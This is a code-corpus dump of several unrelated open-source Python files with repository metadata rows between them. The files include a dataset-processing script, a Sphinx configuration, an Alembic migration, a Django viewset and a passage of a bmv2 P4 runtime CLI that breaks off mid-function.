z["WT2011"] = puf.s006
# write solution to dataframe
for i in year_list:
s006 = np.where(
puf.e02400 > 0,
puf.s006 * Stage_I_factors[i]["APOPSNR"] / 100,
puf.s006 * Stage_I_factors[i]["ARETS"] / 100,
)
array = np.load(str(str(i) + "_output.npz"))
r_val = array["r"]
s_val = array["s"]
z_val = (1.0 + r_val - s_val) * s006 * 100
z[str("WT" + str(i))] = z_val
# Write all weights (rounded to nearest integer) to puf_weights.csv file
z = z.round(0).astype("int64")
z.to_csv(os.path.join(CUR_PATH, "puf_weights.csv.gz"), index=False, compression="gzip")
# remove all .npz (numpy array) files
for file in glob.glob("*.npz"):
os.remove(file)
| 28.52459 | 87 | 0.698276 |
3334f3f75a0f0ab9893baba1b11f8d5b5197c5c2 | 871 | py | Python | scripts/takethecleanest.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 15 | 2020-07-10T08:19:13.000Z | 2022-02-24T08:52:24.000Z | scripts/takethecleanest.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 7 | 2020-08-11T06:26:54.000Z | 2021-04-23T08:32:21.000Z | scripts/takethecleanest.py | multimedia-eurecat/ELFW | 98a6eca7ab9152a7cf8c447ee9f4a62b5629e3b2 | [
"Apache-2.0"
] | 5 | 2020-08-11T09:09:42.000Z | 2020-11-25T12:02:54.000Z | # This script takes all non-ground-truth-labeled images in LFW and copies them apart.
# Rafael Redondo - 2019
import os
import sys
import shutil
if len(sys.argv) != 3:
print "Usage: $ takethecleanest <filelist> <output folder>"
exit(0)
filelist = sys.argv[1]
f = open(filelist,"r")
labels = []
for line in f:
labels.append(line)
output_folder = sys.argv[2]
if not os.path.exists(output_folder):
os.mkdir(output_folder)
faces_folder = '../Datasets/lfw-deepfunneled-bagoffaces/all/'
labels_folder = '../Datasets/lfw-original_from_parts/'
#print labels
for file in os.listdir(labels_folder):
if not file.endswith(".jpg"):
continue
if not any(file in s for s in labels):
src_file = faces_folder + '/' + file
dst_file = output_folder + '/' + file
shutil.copyfile(src_file, dst_file)
print "Copied to " + output_folder + " the file " + src_file
| 21.775 | 85 | 0.709529 |
991f6bacf00735c1c25215d3b1a5d3b69ceade09 | 7,765 | py | Python | process-datasets.py | CERNatschool/beta-attenuation | 86ff4091b5be287eb91b7345399288737bd2e051 | [
"MIT"
] | null | null | null | process-datasets.py | CERNatschool/beta-attenuation | 86ff4091b5be287eb91b7345399288737bd2e051 | [
"MIT"
] | null | null | null | process-datasets.py | CERNatschool/beta-attenuation | 86ff4091b5be287eb91b7345399288737bd2e051 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CERN@school - Processing Datasets
See the README.md file for more information.
"""
# Import the code needed to manage files.
import os, glob
#...for parsing the arguments.
import argparse
#...for the logging.
import logging as lg
#...for file manipulation.
from shutil import rmtree
# Import the JSON library.
import json
#...for processing the datasets.
from cernatschool.dataset import Dataset
#...for making the frame and clusters images.
from visualisation.visualisation import makeFrameImage, makeKlusterImage
#...for getting the cluster properties JSON.
from cernatschool.helpers import getKlusterPropertiesJson
from data.datapoint import DataPoint
if __name__ == "__main__":
print("*")
print("*========================================*")
print("* CERN@school - local dataset processing *")
print("*========================================*")
# Get the datafile path from the command line.
parser = argparse.ArgumentParser()
parser.add_argument("inputPath", help="Path to the input datasets.")
parser.add_argument("outputPath", help="The base path for the output.")
parser.add_argument("-v", "--verbose", help="Increase output verbosity", action="store_true")
parser.add_argument("-g", "--gamma", help="Process gamma candidates too", action="store_true")
args = parser.parse_args()
## The path to the data file.
datapath = args.inputPath
## The output path.
outputpath = args.outputPath
#
# Check if the output directory exists. If it doesn't, quit.
if not os.path.isdir(outputpath):
raise IOError("* ERROR: '%s' output directory does not exist!" % (outputpath))
# Set the logging level.
if args.verbose:
level=lg.DEBUG
else:
level=lg.INFO
# Configure the logging.
lg.basicConfig(filename=outputpath + '/log_process-datasets.log', filemode='w', level=level)
print("*")
print("* Input path : '%s'" % (datapath))
print("* Output path : '%s'" % (outputpath))
print("*")
if args.gamma:
print("* Gamma candidate clusters WILL be processed.")
else:
print("* Gamma candidate clusters WILL NOT be processed.")
print("*")
# Find the data sub-directories.
data_points = []
for entry in sorted(glob.glob((datapath + "/*").replace("//", "/"))):
if os.path.isdir(entry):
data_points.append(DataPoint(entry, outputpath))
data_points = sorted(data_points)
# Set up the directories
#------------------------
# Create the subdirectories.
for dp in data_points:
print("* Processing '%s'." % (dp.get_name()))
# If it exists, delete it.
if os.path.isdir(dp.get_output_path()):
#rmtree(dp.get_output_path())
lg.info(" * Skipping directory '%s'..." % (dp.get_output_path()))
print(" * Skipping directory '%s'..." % (dp.get_output_path()))
continue
os.mkdir(dp.get_output_path())
lg.info(" * Creating directory '%s'..." % (dp.get_output_path()))
lg.info("")
## The path to the frame images.
frpath = (dp.get_output_path() + "/frames/").replace("//", "/")
#
if os.path.isdir(frpath):
rmtree(frpath)
lg.info(" * Removing directory '%s'..." % (frpath))
os.mkdir(frpath)
lg.info(" * Creating directory '%s'..." % (frpath))
lg.info("")
## The path to the cluster images.
klpath = (dp.get_output_path() + "/clusters/").replace("//", "/")
#
if os.path.isdir(klpath):
rmtree(klpath)
lg.info(" * Removing directory '%s'..." % (klpath))
os.mkdir(klpath)
lg.info(" * Creating directory '%s'..." % (klpath))
lg.info("")
## The dataset to process.
ds = Dataset(dp.get_input_path() + "/ASCIIxyC/")
# Get the metadata from the JSON.
## The frame metadata.
fmd = None
#
with open(dp.get_input_path() + "/metadata.json", "r") as fmdf:
fmd = json.load(fmdf, fmd)
#
## Latitude of the dataset [deg.].
lat = fmd[0]['lat'] # [deg.]
#
## Longitude of the dataset [deg.].
lon = fmd[0]['lon'] # [deg.]
#
## Altitude of the dataset [m].
alt = fmd[0]['alt'] # [m]
## The pixel mask.
pixel_mask = {}
with open(dp.get_input_path() + "/masked_pixels.txt", "r") as mpf:
rows = mpf.readlines()
for row in rows:
vals = [int(val) for val in row.strip().split("\t")]
x = vals[0]; y = vals[1]; X = (256*y) + x; C = 1
pixel_mask[X] = C
## The frames from the dataset.
frames = ds.getFrames((lat, lon, alt), pixelmask = pixel_mask)
lg.info(" * Found %d datafiles." % (len(frames)))
## A list of frames.
mds = []
## A list of clusters.
klusters = []
# Loop over the frames.
for i, f in enumerate(frames):
if i % 50 == 0:
print("*--> '%s': processing frame % 10d..." % (dp.get_name(), i))
## The basename for the data frame, based on frame information.
bn = "%s_%d-%06d" % (f.getChipId(), f.getStartTimeSec(), f.getStartTimeSubSec())
# Create the frame image.
makeFrameImage(bn, f.getPixelMap(), frpath)
# Create the metadata dictionary for the frame.
metadata = {
"id" : bn,
#
"chipid" : f.getChipId(),
"hv" : f.getBiasVoltage(),
"ikrum" : f.getIKrum(),
#
"lat" : f.getLatitude(),
"lon" : f.getLongitude(),
"alt" : f.getAltitude(),
#
"start_time" : f.getStartTimeSec(),
"end_time" : f.getEndTimeSec(),
"acqtime" : f.getAcqTime(),
#
"n_pixel" : f.getNumberOfUnmaskedPixels(),
"occ" : f.getOccupancy(),
"occ_pc" : f.getOccupancyPc(),
#
"n_kluster" : f.getNumberOfKlusters(),
"n_gamma" : f.getNumberOfGammas(),
"n_non_gamma" : f.getNumberOfNonGammas(),
#
"ismc" : int(f.isMC())
}
# Add the frame metadata to the list of frames.
mds.append(metadata)
# The cluster analysis
#----------------------
# Loop over the clusters.
for i, kl in enumerate(f.getKlusterFinder().getListOfKlusters()):
if not args.gamma and kl.isGamma():
continue
## The kluster ID.
klusterid = bn + "_k%05d" % (i)
# Get the cluster properties JSON entry and add it to the list.
klusters.append(getKlusterPropertiesJson(klusterid, kl))
# Make the cluster image.
makeKlusterImage(klusterid, kl, klpath)
#break # TMP - uncomment to only process the first frame.
# Write out the frame information to a JSON file.
with open((dp.get_output_path() + "/frames.json").replace("//", "/"), "w") as jf:
json.dump(mds, jf)
# Write out the cluster information to a JSON file.
with open((dp.get_output_path() + "/klusters.json").replace("//", "/"), "w") as jf:
json.dump(klusters, jf)
lg.info(" *")
| 32.086777 | 100 | 0.524404 |
c0cf78c1b797ae3949a6a96b74267aace1a3fbc3 | 5,911 | py | Python | docs/source/conf.py | sanis/zip | 2206cfd9c0024f7d21ce65250e96cc6d89e19655 | [
"MIT"
] | null | null | null | docs/source/conf.py | sanis/zip | 2206cfd9c0024f7d21ce65250e96cc6d89e19655 | [
"MIT"
] | null | null | null | docs/source/conf.py | sanis/zip | 2206cfd9c0024f7d21ce65250e96cc6d89e19655 | [
"MIT"
] | null | null | null | import sys
import os
current_dir = os.path.dirname(os.path.abspath(__file__))
sys.path.append(current_dir)
sys.path.append(current_dir + '/sphinxPHP')
import sensio
extensions = ['sensio.sphinx.refinclude', 'sensio.sphinx.configurationblock', 'sensio.sphinx.phpcode']
extensions = []
templates_path = ['_templates']
source_suffix = '.rst'
#source_encoding = 'utf-8-sig'
master_doc = 'index'
project = u'Elibyy/Zip'
copyright = u'2014, elibyy'
version = '1.0'
release = '1.0'
exclude_patterns = []
pygments_style = 'sphinx'
html_theme = 'Elibyy'
html_theme_path = ['_themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static','API']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'ElibyyZipdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'ElibyyZip.tex', u'Elibyy/Zip Documentation',
u'elibyy', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'elibyyzip', u'Elibyy/Zip Documentation',
[u'elibyy'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'ElibyyZip', u'Elibyy/Zip Documentation',
u'elibyy', 'ElibyyZip', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| 29.853535 | 102 | 0.711386 |
035aef627324e7db41588c5929fd90a6a244463d | 2,397 | py | Python | psi/migrations/versions/40_e1f806a716b9_.py | lusi1990/betterlifepsi | 8e7f8562967ab1816d8c25db3251c550a357f39c | [
"MIT"
] | 33 | 2018-10-19T03:41:56.000Z | 2022-01-23T16:26:02.000Z | psi/migrations/versions/40_e1f806a716b9_.py | lusi1990/betterlifepsi | 8e7f8562967ab1816d8c25db3251c550a357f39c | [
"MIT"
] | 318 | 2018-09-23T15:16:54.000Z | 2022-03-31T22:58:55.000Z | psi/migrations/versions/40_e1f806a716b9_.py | lusi1990/betterlifepsi | 8e7f8562967ab1816d8c25db3251c550a357f39c | [
"MIT"
] | 19 | 2018-10-22T18:04:18.000Z | 2021-12-06T19:49:05.000Z | """ Add create date field to supplier model, make role.is_system and shipping.type_id not null.
Revision ID: e1f806a716b9
Revises: 052340beb7b5
Create Date: 2017-05-25 08:12:35.839903
"""
# revision identifiers, used by Alembic.
revision = 'e1f806a716b9'
down_revision = '052340beb7b5'
from alembic import op
import sqlalchemy as sa
from sqlalchemy import func
from sqlalchemy.sql import text
from datetime import datetime
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('role', 'is_system', existing_type=sa.BOOLEAN(),
nullable=False, existing_server_default=sa.text(u'true'))
op.alter_column('shipping', 'type_id', existing_type=sa.INTEGER(), nullable=False)
op.add_column('supplier', sa.Column('create_date', sa.DateTime(), nullable=True))
results = op.get_bind().execute(text("""
select sup.id, min(so.order_date) from sales_order so, supplier sup,
sales_order_line sol, product p where so.id = sol.sales_order_id and
sol.product_id = p.id and p.supplier_id = sup.id group by sup.id;
""")).fetchall()
for r in results:
sup_id = r[0]
so_date = r[1]
op.get_bind().execute(text("update supplier set create_date = '{0}' where id={1}".format(so_date, sup_id)))
results = op.get_bind().execute(text("""
select sup.id, min(po.order_date) from purchase_order po, supplier sup
where po.supplier_id = sup.id group by sup.id
""")).fetchall()
for r in results:
sup_id = r[0]
po_date = r[1]
op.get_bind().execute(text("update supplier set create_date = '{0}' where id={1} and create_date is null".format(po_date, sup_id)))
op.get_bind().execute(text("update supplier set create_date = '{0}' where create_date is null".format(datetime.now())))
op.alter_column('supplier', 'create_date', existing_type=sa.DateTime(), nullable=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('supplier', 'create_date')
op.alter_column('shipping', 'type_id',
existing_type=sa.INTEGER(),
nullable=True)
op.alter_column('role', 'is_system',
existing_type=sa.BOOLEAN(),
nullable=True,
existing_server_default=sa.text(u'true'))
# ### end Alembic commands ###
| 38.047619 | 139 | 0.670004 |
74c98c4baa4440b934486336f5e4b9ebbc1e7eaa | 483 | py | Python | tag/views.py | farhad0085/django-money-management | d4622192d6b9df3f785abd5f4ef1bfcbf465d045 | [
"MIT"
] | null | null | null | tag/views.py | farhad0085/django-money-management | d4622192d6b9df3f785abd5f4ef1bfcbf465d045 | [
"MIT"
] | null | null | null | tag/views.py | farhad0085/django-money-management | d4622192d6b9df3f785abd5f4ef1bfcbf465d045 | [
"MIT"
] | null | null | null | from .serializers import TagSerializer
from .models import Tag
from rest_framework.viewsets import ModelViewSet
class TagViewSet(ModelViewSet):
queryset = Tag.objects.all()
serializer_class = TagSerializer
def get_serializer(self, *args, **kwargs):
""" if an array is passed, set serializer to many """
if isinstance(kwargs.get('data', {}), list):
kwargs['many'] = True
return super(TagViewSet, self).get_serializer(*args, **kwargs) | 34.5 | 70 | 0.689441 |
a83427cd529ee911c97e0c2908a48199e212ee3f | 150 | py | Python | anuvaad-etl/anuvaad-extractor/document-processor/word-detector/craft/src/routes/__init__.py | srihari-nagaraj/anuvaad | b09b01a033a033e97db6e404c088e0e6332053e4 | [
"MIT"
] | null | null | null | anuvaad-etl/anuvaad-extractor/document-processor/word-detector/craft/src/routes/__init__.py | srihari-nagaraj/anuvaad | b09b01a033a033e97db6e404c088e0e6332053e4 | [
"MIT"
] | null | null | null | anuvaad-etl/anuvaad-extractor/document-processor/word-detector/craft/src/routes/__init__.py | srihari-nagaraj/anuvaad | b09b01a033a033e97db6e404c088e0e6332053e4 | [
"MIT"
] | null | null | null | from .routes import Word_Detector_BLUEPRINT
from .routes import Word_Detector_BLUEPRINT_WF
#from .documentstructure import DOCUMENTSTRUCTURE_BLUEPRINT | 50 | 59 | 0.9 |
3d4bdbf9b603b630dbcc0d42709b2de06aeef154 | 86,612 | py | Python | networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/runtime_api.py | osinstom/networking-p4 | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | 2 | 2019-12-26T08:53:25.000Z | 2020-05-13T11:53:51.000Z | networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/runtime_api.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | networking_p4/agent/agent_drivers/bmv2/adaptor/bmv2/runtime_api.py | osinstom/networking-dppx | 3b82025090b6b2bf1e9faa58492d13ed1da6c34f | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Antonin Bas (antonin@barefootnetworks.com)
#
#
import argparse
from collections import Counter
import os
import sys
import struct
import json
from functools import wraps
from networking_p4.agent.agent_drivers.bmv2.adaptor.bmv2 import bmpy_utils as utils
from bm_runtime.standard import Standard
from bm_runtime.standard.ttypes import *
try:
from bm_runtime.simple_pre import SimplePre
except:
pass
try:
from bm_runtime.simple_pre_lag import SimplePreLAG
except:
pass
def enum(type_name, *sequential, **named):
enums = dict(zip(sequential, range(len(sequential))), **named)
reverse = dict((value, key) for key, value in enums.iteritems())
@staticmethod
def to_str(x):
return reverse[x]
enums['to_str'] = to_str
@staticmethod
def from_str(x):
return enums[x]
enums['from_str'] = from_str
return type(type_name, (), enums)
PreType = enum('PreType', 'None', 'SimplePre', 'SimplePreLAG')
MeterType = enum('MeterType', 'packets', 'bytes')
TableType = enum('TableType', 'simple', 'indirect', 'indirect_ws')
ResType = enum('ResType', 'table', 'action_prof', 'action', 'meter_array',
'counter_array', 'register_array')
def bytes_to_string(byte_array):
form = 'B' * len(byte_array)
return struct.pack(form, *byte_array)
def table_error_name(x):
return TableOperationErrorCode._VALUES_TO_NAMES[x]
def get_parser():
class ActionToPreType(argparse.Action):
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs is not None:
raise ValueError("nargs not allowed")
super(ActionToPreType, self).__init__(option_strings, dest, **kwargs)
def __call__(self, parser, namespace, values, option_string=None):
assert(type(values) is str)
setattr(namespace, self.dest, PreType.from_str(values))
parser = argparse.ArgumentParser(description='BM runtime CLI')
# One port == one device !!!! This is not a multidevice CLI
parser.add_argument('--thrift-port', help='Thrift server port for table updates',
type=int, action="store", default=9090)
parser.add_argument('--thrift-ip', help='Thrift IP address for table updates',
type=str, action="store", default='localhost')
parser.add_argument('--json', help='JSON description of P4 program',
type=str, action="store", required=False)
parser.add_argument('--pre', help='Packet Replication Engine used by target',
type=str, choices=['None', 'SimplePre', 'SimplePreLAG'],
default=PreType.SimplePre, action=ActionToPreType)
return parser
TABLES = {}
ACTION_PROFS = {}
ACTIONS = {}
METER_ARRAYS = {}
COUNTER_ARRAYS = {}
REGISTER_ARRAYS = {}
CUSTOM_CRC_CALCS = {}
# maps (object type, unique suffix) to object
SUFFIX_LOOKUP_MAP = {}
class MatchType:
EXACT = 0
LPM = 1
TERNARY = 2
VALID = 3
RANGE = 4
@staticmethod
def to_str(x):
return {0: "exact", 1: "lpm", 2: "ternary", 3: "valid", 4: "range"}[x]
@staticmethod
def from_str(x):
return {"exact": 0, "lpm": 1, "ternary": 2, "valid": 3, "range": 4}[x]
class Table:
def __init__(self, name, id_):
self.name = name
self.id_ = id_
self.match_type_ = None
self.actions = {}
self.key = []
self.default_action = None
self.type_ = None
self.support_timeout = False
self.action_prof = None
TABLES[name] = self
def num_key_fields(self):
return len(self.key)
def key_str(self):
return ",\t".join([name + "(" + MatchType.to_str(t) + ", " + str(bw) + ")" for name, t, bw in self.key])
def table_str(self):
ap_str = "implementation={}".format(
"None" if not self.action_prof else self.action_prof.name)
return "{0:30} [{1}, mk={2}]".format(self.name, ap_str, self.key_str())
def get_action(self, action_name):
key = ResType.action, action_name
action = SUFFIX_LOOKUP_MAP.get(key, None)
if action is None or action.name not in self.actions:
return None
return action
class ActionProf:
def __init__(self, name, id_):
self.name = name
self.id_ = id_
self.with_selection = False
self.actions = {}
self.ref_cnt = 0
ACTION_PROFS[name] = self
def action_prof_str(self):
return "{0:30} [{1}]".format(self.name, self.with_selection)
def get_action(self, action_name):
key = ResType.action, action_name
action = SUFFIX_LOOKUP_MAP.get(key, None)
if action is None or action.name not in self.actions:
return None
return action
class Action:
def __init__(self, name, id_):
self.name = name
self.id_ = id_
self.runtime_data = []
ACTIONS[name] = self
def num_params(self):
return len(self.runtime_data)
def runtime_data_str(self):
return ",\t".join([name + "(" + str(bw) + ")" for name, bw in self.runtime_data])
def action_str(self):
return "{0:30} [{1}]".format(self.name, self.runtime_data_str())
class MeterArray:
def __init__(self, name, id_):
self.name = name
self.id_ = id_
self.type_ = None
self.is_direct = None
self.size = None
self.binding = None
self.rate_count = None
METER_ARRAYS[name] = self
def meter_str(self):
return "{0:30} [{1}, {2}]".format(self.name, self.size,
MeterType.to_str(self.type_))
class CounterArray:
def __init__(self, name, id_):
self.name = name
self.id_ = id_
self.is_direct = None
self.size = None
self.binding = None
COUNTER_ARRAYS[name] = self
def counter_str(self):
return "{0:30} [{1}]".format(self.name, self.size)
class RegisterArray:
def __init__(self, name, id_):
self.name = name
self.id_ = id_
self.width = None
self.size = None
REGISTER_ARRAYS[name] = self
def register_str(self):
return "{0:30} [{1}]".format(self.name, self.size)
def reset_config():
TABLES.clear()
ACTION_PROFS.clear()
ACTIONS.clear()
METER_ARRAYS.clear()
COUNTER_ARRAYS.clear()
REGISTER_ARRAYS.clear()
CUSTOM_CRC_CALCS.clear()
SUFFIX_LOOKUP_MAP.clear()
def load_json_str(json_str):
def get_header_type(header_name, j_headers):
for h in j_headers:
if h["name"] == header_name:
return h["header_type"]
assert(0)
def get_field_bitwidth(header_type, field_name, j_header_types):
for h in j_header_types:
if h["name"] != header_type: continue
for t in h["fields"]:
# t can have a third element (field signedness)
f, bw = t[0], t[1]
if f == field_name:
return bw
assert(0)
reset_config()
json_ = json.loads(json_str)
def get_json_key(key):
return json_.get(key, [])
for j_action in get_json_key("actions"):
action = Action(j_action["name"], j_action["id"])
for j_param in j_action["runtime_data"]:
action.runtime_data += [(j_param["name"], j_param["bitwidth"])]
for j_pipeline in get_json_key("pipelines"):
if "action_profiles" in j_pipeline: # new JSON format
for j_aprof in j_pipeline["action_profiles"]:
action_prof = ActionProf(j_aprof["name"], j_aprof["id"])
action_prof.with_selection = "selector" in j_aprof
for j_table in j_pipeline["tables"]:
table = Table(j_table["name"], j_table["id"])
table.match_type = MatchType.from_str(j_table["match_type"])
table.type_ = TableType.from_str(j_table["type"])
table.support_timeout = j_table["support_timeout"]
for action in j_table["actions"]:
table.actions[action] = ACTIONS[action]
if table.type_ in {TableType.indirect, TableType.indirect_ws}:
if "action_profile" in j_table:
action_prof = ACTION_PROFS[j_table["action_profile"]]
else: # for backward compatibility
assert("act_prof_name" in j_table)
action_prof = ActionProf(j_table["act_prof_name"],
table.id_)
action_prof.with_selection = "selector" in j_table
action_prof.actions.update(table.actions)
action_prof.ref_cnt += 1
table.action_prof = action_prof
for j_key in j_table["key"]:
target = j_key["target"]
match_type = MatchType.from_str(j_key["match_type"])
if match_type == MatchType.VALID:
field_name = target + "_valid"
bitwidth = 1
elif target[1] == "$valid$":
field_name = target[0] + "_valid"
bitwidth = 1
else:
field_name = ".".join(target)
header_type = get_header_type(target[0],
json_["headers"])
bitwidth = get_field_bitwidth(header_type, target[1],
json_["header_types"])
table.key += [(field_name, match_type, bitwidth)]
for j_meter in get_json_key("meter_arrays"):
meter_array = MeterArray(j_meter["name"], j_meter["id"])
if "is_direct" in j_meter and j_meter["is_direct"]:
meter_array.is_direct = True
meter_array.binding = j_meter["binding"]
else:
meter_array.is_direct = False
meter_array.size = j_meter["size"]
meter_array.type_ = MeterType.from_str(j_meter["type"])
meter_array.rate_count = j_meter["rate_count"]
for j_counter in get_json_key("counter_arrays"):
counter_array = CounterArray(j_counter["name"], j_counter["id"])
counter_array.is_direct = j_counter["is_direct"]
if counter_array.is_direct:
counter_array.binding = j_counter["binding"]
else:
counter_array.size = j_counter["size"]
for j_register in get_json_key("register_arrays"):
register_array = RegisterArray(j_register["name"], j_register["id"])
register_array.size = j_register["size"]
register_array.width = j_register["bitwidth"]
for j_calc in get_json_key("calculations"):
calc_name = j_calc["name"]
if j_calc["algo"] == "crc16_custom":
CUSTOM_CRC_CALCS[calc_name] = 16
elif j_calc["algo"] == "crc32_custom":
CUSTOM_CRC_CALCS[calc_name] = 32
# Builds a dictionary mapping (object type, unique suffix) to the object
# (Table, Action, etc...). In P4_16 the object name is the fully-qualified
# name, which can be quite long, which is why we accept unique suffixes as
# valid identifiers.
# Auto-complete does not support suffixes, only the fully-qualified names,
# but that can be changed in the future if needed.
suffix_count = Counter()
for res_type, res_dict in [
(ResType.table, TABLES), (ResType.action_prof, ACTION_PROFS),
(ResType.action, ACTIONS), (ResType.meter_array, METER_ARRAYS),
(ResType.counter_array, COUNTER_ARRAYS),
(ResType.register_array, REGISTER_ARRAYS)]:
for name, res in res_dict.items():
suffix = None
for s in reversed(name.split('.')):
suffix = s if suffix is None else s + '.' + suffix
key = (res_type, suffix)
SUFFIX_LOOKUP_MAP[key] = res
suffix_count[key] += 1
for key, c in suffix_count.items():
if c > 1:
del SUFFIX_LOOKUP_MAP[key]
class UIn_Error(Exception):
def __init__(self, info=""):
self.info = info
def __str__(self):
return self.info
class UIn_ResourceError(UIn_Error):
def __init__(self, res_type, name):
self.res_type = res_type
self.name = name
def __str__(self):
return "Invalid %s name (%s)" % (self.res_type, self.name)
class UIn_MatchKeyError(UIn_Error):
def __init__(self, info=""):
self.info = info
def __str__(self):
return self.info
class UIn_RuntimeDataError(UIn_Error):
def __init__(self, info=""):
self.info = info
def __str__(self):
return self.info
class CLI_FormatExploreError(Exception):
def __init__(self):
pass
class UIn_BadParamError(UIn_Error):
def __init__(self, info=""):
self.info = info
def __str__(self):
return self.info
class UIn_BadIPv4Error(UIn_Error):
def __init__(self):
pass
class UIn_BadIPv6Error(UIn_Error):
def __init__(self):
pass
class UIn_BadMacError(UIn_Error):
def __init__(self):
pass
def ipv4Addr_to_bytes(addr):
if not '.' in addr:
raise CLI_FormatExploreError()
s = addr.split('.')
if len(s) != 4:
raise UIn_BadIPv4Error()
try:
return [int(b) for b in s]
except:
raise UIn_BadIPv4Error()
def macAddr_to_bytes(addr):
if not ':' in addr:
raise CLI_FormatExploreError()
s = addr.split(':')
if len(s) != 6:
raise UIn_BadMacError()
try:
return [int(b, 16) for b in s]
except:
raise UIn_BadMacError()
def ipv6Addr_to_bytes(addr):
from ipaddr import IPv6Address
if not ':' in addr:
raise CLI_FormatExploreError()
try:
ip = IPv6Address(addr)
except:
raise UIn_BadIPv6Error()
try:
return [ord(b) for b in ip.packed]
except:
raise UIn_BadIPv6Error()
def int_to_bytes(i, num):
byte_array = []
while i > 0:
byte_array.append(i % 256)
i = i / 256
num -= 1
if num < 0:
raise UIn_BadParamError("Parameter is too large")
while num > 0:
byte_array.append(0)
num -= 1
byte_array.reverse()
return byte_array
def parse_param(input_str, bitwidth):
if bitwidth == 32:
try:
return ipv4Addr_to_bytes(input_str)
except CLI_FormatExploreError:
pass
except UIn_BadIPv4Error:
raise UIn_BadParamError("Invalid IPv4 address")
elif bitwidth == 48:
try:
return macAddr_to_bytes(input_str)
except CLI_FormatExploreError:
pass
except UIn_BadMacError:
raise UIn_BadParamError("Invalid MAC address")
elif bitwidth == 128:
try:
return ipv6Addr_to_bytes(input_str)
except CLI_FormatExploreError:
pass
except UIn_BadIPv6Error:
raise UIn_BadParamError("Invalid IPv6 address")
try:
input_ = int(input_str, 0)
except:
